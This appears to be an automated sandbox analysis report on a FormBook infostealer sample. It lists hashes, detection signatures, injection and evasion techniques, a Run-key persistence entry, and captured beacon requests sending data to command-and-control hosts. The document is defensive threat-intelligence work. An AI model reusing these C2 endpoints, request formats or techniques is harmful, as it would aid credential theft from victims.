Sample Name: Mqbmupv_Signed_.exe
Analysis ID: 288093
MD5: 20a3b044b6d1b39051e35269e6590c0b
SHA1: bc6bc3a617091a5f13dcfe134b3a55d19e8f77e6
SHA256: 2ead77594bc7d6fb376764fad896f830955a1ac70155c0f9feb42299f5c788a9
Tags: exe

### Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

### Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### AV Detection

 Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Mqbmnet.exe Virustotal: Detection: 27%
Source: C:\Users\user\AppData\Local\Mqbmnet.exe ReversingLabs: Detection: 45%
 Multi AV Scanner detection for submitted file
Source: Mqbmupv_Signed_.exe Virustotal: Detection: 27%
Source: Mqbmupv_Signed_.exe ReversingLabs: Detection: 45%
 Yara detected FormBook
Source: Yara match File source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file
Source: 29.2.ieinstal.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.ieinstal.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Contains functionality to enumerate / list files inside a directory

### Software Vulnerabilities

 Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop esi 9_2_00417274
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop edi 9_2_00416BCD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop edi 9_2_00417CA7

### Networking

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49754
 HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1 Host: www.thelocaladda.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1 Host: www.kingofinvest.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.58.78.16
Source: Joe Sandbox View IP Address: 162.159.129.233
 Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: GOOGLEUS
 JA3 SSL client fingerprint seen in connection with other malware
 Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
 Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1 Host: www.thelocaladda.com Connection: close Content-Length: 413 Cache-Control: no-cache Origin: http://www.thelocaladda.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.thelocaladda.com/ksh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1 Host: www.thelocaladda.com Connection: close Content-Length: 184809 Cache-Control: no-cache Origin: http://www.thelocaladda.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.thelocaladda.com/ksh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1 Host: www.kingofinvest.com Connection: close Content-Length: 413 Cache-Control: no-cache Origin: http://www.kingofinvest.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.kingofinvest.com/ksh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1 Host: www.kingofinvest.com Connection: close Content-Length: 184809 Cache-Control: no-cache Origin: http://www.kingofinvest.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.kingofinvest.com/ksh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
 Performs DNS lookups
 Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
 Posts data to webserver
Source: unknown HTTP traffic detected: POST /ksh/ HTTP/1.1 Host: www.thelocaladda.com Connection: close Content-Length: 413 Cache-Control: no-cache Origin: http://www.thelocaladda.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.thelocaladda.com/ksh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
 Urls found in memory or binary data
 Uses HTTPS
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443

### E-Banking Fraud

 Yara detected FormBook

### System Summary

 Detected FormBook malware
 Malicious sample detected (through community Yara rule)
Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions
 Detected potential crypto function
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00401030
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041D97B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DADA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00402D90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DDA4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041E654
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DE0B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409E2E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041CEE3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041CEE6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DEFF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DF1F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00402FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0319EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0316F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03184120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03221002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_031920A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03186E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03160D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03231D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03192581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317841F
Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0
 Found potential string decryption / allocating functions
 Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 50484224 appears 50 times
 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: String function: 0231C890 appears 48 times
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 0316B150 appears 32 times
 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: String function: 04B2B4A4 appears 32 times
 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: String function: 04B23AF4 appears 40 times
 PE / OLE file has an invalid certificate
 Source: Mqbmupv_Signed_.exe Static PE information: invalid certificate
 PE file contains strange resources
 Source: Mqbmupv_Signed_.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
 Source: Mqbmupv_Signed_.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Source: Mqbmnet.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
 Source: Mqbmnet.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file name differs from the original file name gathered from version info
 Source: Mqbmupv_Signed_.exe, 00000000.00000000.204808352.0000000000465000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameYes( vs Mqbmupv_Signed_.exe
 Yara signature match
 Classification label
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/9@5/5
 Contains functionality to check free disk space
 Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_5048784E GetDiskFreeSpaceA, 2_2_5048784E
 Creates files inside the user directory
 Creates mutexes
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
 Executes batch files
 Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
 Parts of this application are using Borland Delphi (probably coded in Delphi)
 Sample is known by Antivirus
 Source: Mqbmupv_Signed_.exe Virustotal: Detection: 27%
 Source: Mqbmupv_Signed_.exe ReversingLabs: Detection: 45%
 Sample reads its own file content
 Spawns processes
 Uses an in-process (OLE) Automation server
 Writes ini files
 Found graphical window changes (likely an installer)
 Source: Window Recorder Window detected: More than 3 window changes detected
 Checks if Microsoft Office is installed
 Binary contains paths to debug symbols
 Source: Binary string: ipconfig.pdb source: ieinstal.exe, 00000009.00000002.344052381.00000000009D0000.00000040.00000001.sdmp
 Source: Binary string: ipconfig.pdbGCTL source: ieinstal.exe, 00000009.00000002.344052381.00000000009D0000.00000040.00000001.sdmp
 Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.317337794.000000000EEC0000.00000002.00000001.sdmp
 Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000009.00000002.345112527.0000000003140000.00000040.00000001.sdmp
 Source: Binary string: wntdll.pdb source: ieinstal.exe
 Source: Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.317337794.000000000EEC0000.00000002.00000001.sdmp

### Data Obfuscation:

 Uses code obfuscation techniques (call, push, ret)
 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231AAF8 push 004069CEh; ret 0_3_0231AB32
 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231A6D4 push 004065C3h; ret 0_3_0231A727
 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_04C60BE8 push eax; ret 0_3_04C60C24
 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210
 Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_504878E8 push ecx; mov dword ptr [esp], eax 2_2_504878E9
 Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_504911D0 push ecx; mov dword ptr [esp], ecx 2_2_504911D5
 Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_50486192 push 504861C0h; ret 2_2_504861B8
 Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_50486194 push 504861C0h; ret 2_2_504861B8

### Persistence and Installation Behavior:

 Uses ipconfig to lookup or modify the Windows network settings
 Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
 Drops PE files
 Creates an autostart registry key
 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mqbm

### Hooking and other Techniques for Hiding and Protection:

 Modifies the prolog of user mode functions (user mode inline hooks)
 Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE6
 Disables application error messages (SetErrorMode)

### Malware Analysis System Evasion:

 Tries to detect virtualization through RDTSC time measurements
 Contains functionality for execution timing, often used to detect debuggers
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409A80 rdtsc 9_2_00409A80
 Contains long sleeps (>= 3 min)
 May sleep (evasive loops) to hinder dynamic analysis
 Sample execution stops while process was sleeping (likely an evasion)
 Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
 Contains functionality to enumerate / list files inside a directory
 May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
 Queries a list of all running processes
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information queried: ProcessInformation

### Anti Debugging:

 Checks if the current process is being debugged
 Contains functionality for execution timing, often used to detect debuggers
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409A80 rdtsc 9_2_00409A80